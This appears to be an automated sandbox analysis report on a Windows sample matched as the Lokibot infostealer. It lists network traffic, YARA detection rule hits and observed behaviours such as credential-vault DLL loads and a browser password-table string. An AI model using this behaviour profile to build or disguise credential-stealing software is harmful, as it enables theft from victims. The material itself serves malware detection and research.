Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:38 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:40 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:41 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:42 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:43 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:44 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:45 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:47 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:48 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:49 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:50 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:52 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:53 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:54 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:55 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:56 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:58 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:59 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:22:00 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:22:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:22:02 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:22:05 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:22:06 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:22:07 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

String found in binary or memory: http://www.ibsensoftware.com/

System Summary

Malicious sample detected (through community Yara rule)

Source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe, type: SAMPLE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe, type: SAMPLE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe, type: SAMPLE	Matched rule: Loki Payload Author: kevoreilly
Source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe, type: SAMPLE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe, type: SAMPLE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.0.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.0.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.0.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.0.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.0.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000000.1682431268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000000.1682466074.0000000000415000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe PID: 7468, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Code function: 0_2_0040549C		0_2_0040549C
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Code function: 0_2_004029D4		0_2_004029D4

Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Code function: String function: 00405B6F appears 41 times

Source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe, type: SAMPLE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe, type: SAMPLE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe, type: SAMPLE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe, type: SAMPLE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.0.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.0.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.0.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.0.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.0.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000000.1682431268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000000.1682466074.0000000000415000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe PID: 7468, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/2@0/1

Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Code function: 0_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,

0_2_0040650A

Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Code function: 0_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

0_2_0040434D

Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

Jump to behavior

Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C

Source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe, 00000000.00000003.1683916411.0000000000655000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

ReversingLabs: Detection: 97%

Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Section loaded: dnsapi.dll	Jump to behavior
